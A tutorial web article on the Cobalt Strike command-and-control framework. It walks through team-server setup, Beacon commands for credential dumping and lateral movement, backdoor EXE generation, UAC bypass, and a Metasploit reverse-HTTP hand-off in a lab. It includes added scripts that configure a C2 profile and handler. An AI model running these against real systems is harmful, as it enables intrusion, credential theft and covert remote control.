Shulou (Shulou.com), 05/31 report; last updated 2025-01-16. Category: Network Security.
Many newcomers are unclear about the basic use of this intranet penetration tool. To help, the editor below walks through it in detail; readers who need it are welcome to follow along and hopefully take something away.
1. Introduction to Cobalt Strike, the intranet penetration tool
Cobalt Strike is a GUI penetration testing and command-and-control (C2) framework. Early versions were built on top of Metasploit; since version 3.0 it runs stand-alone, although it still hands sessions to Metasploit through its foreign listeners. It bundles port forwarding, service scanning, automated exploitation, listeners for several protocols, and generation of EXE and PowerShell payloads.
Its phishing features include site cloning, target profiling, Java applet execution, and automatic browser attacks.
Cobalt Strike is designed for team operations: several operators connect to one team server at the same time and share attack resources, target information, and sessions.
As a collaborative post-exploitation tool it has become a favourite of many APT groups, both for intranet penetration and as their C2 server.
2. Starting Cobalt Strike
1. Start the team server
The server side needs two key files: teamserver and cobaltstrike.jar.
Open a terminal, change into the Cobalt Strike directory, and run: sudo ./teamserver <host> <password> [/path/to/c2.profile]
1. host (required): the public IP address or domain name of this server, which Beacons call back to.
2. password (required): the password operators enter when connecting with the client GUI.
3. Malleable C2 profile (optional): the path of a C2 communication profile; this is the feature that lets Cobalt Strike reshape its network traffic.
Example: the local IP is 192.168.1.136, so the command is sudo ./teamserver 192.168.1.136 <password>
2. Start the client with cobaltstrike.jar and fill in the host, port (the team server listens on TCP 50050 by default) and password used when starting the server.
Click Connect to enter the main interface. On the first connection the client shows the SHA256 fingerprint of the team server's certificate; compare it with the fingerprint printed in the terminal when the team server started before accepting it, otherwise a man-in-the-middle could capture the team server password.
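The start-up procedure above, as an added example (not from the article or the Cobalt Strike distribution): a small POSIX shell wrapper that writes a minimal Malleable C2 profile, checks it with c2lint, validates the host and password arguments, and only then starts the team server. The profile contents, the /api/v1/... URIs and the example host are assumptions made for illustration; it assumes it is run from the directory that contains ./teamserver and ./c2lint.

```shell
#!/bin/sh
# Added example, not from the article or the Cobalt Strike distribution.
# Assumptions: run from the Cobalt Strike directory (./teamserver, ./c2lint);
# the profile below, its URIs and the example host/password are illustrative.
set -eu

# Write a minimal Malleable C2 profile to the path given in $1 (constructed sample).
write_profile() {
  cat > "$1" <<'EOF'
set sleeptime "30000";
set jitter    "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

http-get {
    set uri "/api/v1/status";
    client {
        header "Accept" "*/*";
        metadata {
            base64url;
            parameter "sid";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            netbios;
            print;
        }
    }
}

http-post {
    set uri "/api/v1/submit";
    client {
        header "Content-Type" "application/octet-stream";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            netbios;
            print;
        }
    }
}
EOF
}

# The host must be a bare IPv4 address or DNS name: reject anything that could
# smuggle extra tokens into the sudo ./teamserver argument list.
validate_host() {
  case "$1" in
    "" | *[!A-Za-z0-9.-]* ) return 1 ;;
  esac
}

# The password is passed as one argv item; teamserver refuses more than 50 characters.
validate_password() {
  [ -n "$1" ] && [ "${#1}" -le 50 ]
}

# Lint the profile first: a profile that fails c2lint makes teamserver exit on start.
lint_profile() {
  if [ -x ./c2lint ]; then
    ./c2lint "$1"
  else
    echo "warning: ./c2lint not found, profile not checked" >&2
  fi
}

start_teamserver() {
  host=$1; pass=$2; profile=${3:-}
  validate_host "$host" || { echo "invalid host: $host" >&2; return 1; }
  validate_password "$pass" || { echo "invalid password" >&2; return 1; }
  # teamserver listens on TCP 50050; restrict that port to operator IPs in the host firewall.
  if [ -n "$profile" ]; then
    lint_profile "$profile" || return 1
    sudo ./teamserver "$host" "$pass" "$profile"
  else
    sudo ./teamserver "$host" "$pass"
  fi
}

# Usage: sh start-cs.sh run 192.168.1.136 'StrongPassw0rd'
if [ "${1:-}" = "run" ]; then
  write_profile ./c2.profile
  start_teamserver "$2" "$3" ./c2.profile
fi
```

The host check matters because the script runs teamserver under sudo; the password length check mirrors the limit the teamserver script enforces, so a rejected password is caught before anything starts.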
3. Menu overview
1. Cobalt Strike menu
1. New Connection (connect to additional team servers; several connections can be open at once)
2. Preferences (console appearance and settings)
3. Visualization (how sessions are presented)
4. VPN Interfaces (configure Covert VPN)
5. Listeners (manage listener configurations)
6. Script Manager (load and manage third-party Aggressor scripts)
2. View menu
1. Applications (applications found on the compromised machine)
2. Credentials (passwords and hashes captured with hashdump or mimikatz are saved here)
3. Downloads (files downloaded from targets)
4. Event Log (event logging)
5. Keystrokes (keylogger output)
6. Proxy Pivots (active SOCKS and port-forward pivots)
7. Screenshots (screen captures taken from the target)
8. Script Console (command interface for Aggressor scripts)
9. Targets (known target hosts)
10. Web Log (requests received by the team server's web services)
3. Attacks menu
Packages:
1. HTML Application (generate a malicious HTA file)
2. MS Office Macro (generate an Office macro payload)
3. Payload Generator (generate payloads in various languages)
4. Windows Executable (generate a staged executable payload)
5. Windows Executable (S) (generate a stageless executable that contains the full Beacon)
Web Drive-by:
1. Manage (manage the web services currently hosted)
2. Clone Site (clone a website)
3. Host File (serve a file for download over the web)
4. Scripted Web Delivery (host a web service that makes it easy to download and execute a PowerShell payload, similar to Metasploit's web_delivery)
5. Signed Applet Attack (start a web service that runs a self-signed Java applet)
6. Smart Applet Attack (detect the Java version and use known exploits to escape the sandbox)
7. System Profiler (collect system information from visitors)
4. Beacon commands
beacon> help
Beacon Commands
command: description
argue: spoof the command-line arguments of a spawned process
blockdlls: block non-Microsoft DLLs from loading into child processes
browserpivot: set up a browser pivot by injecting into the victim's browser process
bypassuac: spawn a high-integrity session by bypassing UAC
cancel: cancel a download in progress
cd: change directory
checkin: force the Beacon to call home and post data once
clear: clear Beacon's task queue
connect: connect to a Beacon peer over TCP
covertvpn: deploy a Covert VPN client
cp: copy a file
dcsync: extract password hashes from the domain controller
desktop: remote desktop (VNC)
dllinject: inject a reflective DLL into a process
dllload: load a DLL into a process with LoadLibrary
download: download a file
downloads: list downloads in progress
drives: list the target's drive letters
elevate: escalate privileges with an exploit
execute: execute a program on the target (no output)
execute-assembly: execute a local .NET program in memory on the target
exit: terminate the Beacon session
getprivs: enable system privileges on the current token
getsystem: attempt to get SYSTEM
getuid: get the user ID
hashdump: dump password hashes
help: help
inject: spawn a session in a specific process
jobkill: kill a background job
jobs: list background jobs
kerberos_ccache_use: apply Kerberos tickets from a ccache file to this session
kerberos_ticket_purge: purge the Kerberos tickets of this session
kerberos_ticket_use: apply a Kerberos ticket from a file to this session
keylogger: start a keystroke logger
kill: kill a process
link: connect to a Beacon peer over a named pipe
logonpasswords: dump credentials and hashes with mimikatz
ls: list files
make_token: create a token to pass credentials
mimikatz: run a mimikatz command
mkdir: make a directory
mode dns: use DNS A records as the data channel (DNS Beacon only)
mode dns-txt: use DNS TXT records as the data channel (DNS Beacon only)
mode dns6: use DNS AAAA records as the data channel (DNS Beacon only)
mode http: use HTTP as the data channel
mv: move a file
net: network and host enumeration (net commands)
note: assign a note to this Beacon
portscan: scan a network for open services
powerpick: execute a command via Unmanaged PowerShell
powershell: execute a command via powershell.exe
powershell-import: import a PowerShell script
ppid: set the parent PID for spawned post-exploitation jobs
ps: show the process list
psexec: use a service to spawn a session on a host
psexec_psh: use PowerShell to spawn a session on a host
psinject: execute a PowerShell command in a specific process
pth: pass-the-hash using mimikatz
pwd: print the current directory
reg: query the registry
rev2self: revert to the original token
rm: remove a file or folder
rportfwd: set up a reverse port forward
run: execute a program on the target (returns output)
runas: execute a program as another user
runasadmin: execute a program in an elevated context
runu: execute a program under another PID
screenshot: take a screenshot
setenv: set an environment variable
shell: execute a command via cmd.exe
shinject: inject shellcode into a process
shspawn: spawn a process and inject shellcode into it
sleep: set Beacon's sleep time
socks: start a SOCKS4a proxy server
socks stop: stop the SOCKS4a proxy server
spawn: spawn a session
spawnas: spawn a session as another user
spawnto: set the executable to spawn processes into
spawnu: spawn a session under another PID
ssh: use SSH to spawn an SSH session on a host
ssh-key: use SSH with a key to spawn an SSH session on a host
steal_token: steal an access token from a process
timestomp: apply the timestamps of one file to another
unlink: disconnect from a parent Beacon
upload: upload a file
wdigest: dump plaintext credentials with mimikatz
winrm: use WinRM to spawn a session on a host (lateral movement)
wmi: use WMI to spawn a session on a host (lateral movement)
4. Using Cobalt Strike
1. Create a listener
Note: this version of CS offers 8 listener types:
The beacon_xx series are Cobalt Strike's own listeners, covering DNS, HTTP, HTTPS and SMB.
The foreign series are external listeners, normally used to hand sessions to MSF or Armitage.
Once created, the listener shows as started.
2. Generate a backdoor
Click Attacks > Packages > Windows Executable.
Choose the listener just created, and pick 64-bit or 32-bit to match the target system.
Save the generated backdoor EXE.
3. Connect
Upload the backdoor to the victim machine and run it; the host appears as online in the client.
Right-click the host and choose Interact to open a Beacon console, where the commands listed above can be issued.
Note: Beacon's built-in commands are limited and not always convenient; the Ladon Aggressor script adds many more.
Download Ladon from: https://github.com/k8gege/Ladon
Usage of Ladon inside Cobalt Strike: https://github.com/k8gege/Aggressor
4. Privilege escalation
Right-click the online host, choose Access > Elevate, and pick one of the UAC bypass exploits.
On success a new, high-integrity Beacon for the same host appears; continue the operation from that one.
5. Working together with MSF
Kali IP: 172.16.20.18
Victim machine: 172.16.20.20
CS team server: 172.16.20.19
1. Create a handler in MSF
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 172.16.20.18
lhost => 172.16.20.18
msf5 exploit(multi/handler) > set lport 3333
lport => 3333
msf5 exploit(multi/handler) > run
Note: the handler listens on Kali's own address.
2. Add a matching foreign listener in CS
Create a Foreign HTTP listener whose host and port are those of the MSF handler (172.16.20.18:3333).
Note: the listener type must match the handler's payload, Foreign HTTP for windows/meterpreter/reverse_http and Foreign HTTPS for windows/meterpreter/reverse_https; with a mismatch the stager speaks the wrong protocol and no session arrives.
Right-click the Beacon, choose Spawn, and select the foreign listener.
MSF then receives a Meterpreter session.
Type shell in Meterpreter to get a command prompt on the host.
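The MSF side of the hand-off above, as an added example (not from the article, Metasploit or Cobalt Strike): a POSIX shell script that generates an msfconsole resource file for the handler and names the CS foreign listener type that must be paired with the chosen Meterpreter payload. It assumes the article's lab addresses (Kali 172.16.20.18, port 3333); the file name handler.rc is an arbitrary choice. The helper covers the two HTTP-based stagers the article's setup depends on.

```shell
#!/bin/sh
# Added example, not from the article or from Metasploit/Cobalt Strike.
# Assumptions: the article's lab addresses (Kali 172.16.20.18, port 3333);
# the file name handler.rc is arbitrary.
set -eu

# Emit a msfconsole resource script for the multi/handler that the CS
# foreign listener will hand sessions to.
handler_rc() {
  lhost=$1; lport=$2; payload=${3:-windows/meterpreter/reverse_http}
  cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
# keep the handler alive after the first session so several Beacons can spawn into it
set ExitOnSession false
exploit -j -z
EOF
}

# A foreign listener only works when it speaks the same staging protocol as
# the handler payload; this maps the two HTTP stagers used here to their
# CS listener type and rejects anything else.
foreign_listener_for() {
  case "$1" in
    windows/meterpreter/reverse_http)  echo "Foreign HTTP" ;;
    windows/meterpreter/reverse_https) echo "Foreign HTTPS" ;;
    *) echo "no matching CS foreign listener for payload $1" >&2; return 1 ;;
  esac
}

# Usage: sh msf-handler.sh run
# Then create the printed listener type in CS (host 172.16.20.18, port 3333)
# and Spawn a Beacon into it.
if [ "${1:-}" = "run" ]; then
  payload=windows/meterpreter/reverse_http
  handler_rc 172.16.20.18 3333 "$payload" > handler.rc
  echo "create a '$(foreign_listener_for "$payload")' listener in CS at 172.16.20.18:3333"
  msfconsole -q -r handler.rc
fi
```

Running the handler as a background job with ExitOnSession false means the same handler keeps accepting sessions from every Beacon that is spawned into the foreign listener, instead of exiting after the first one.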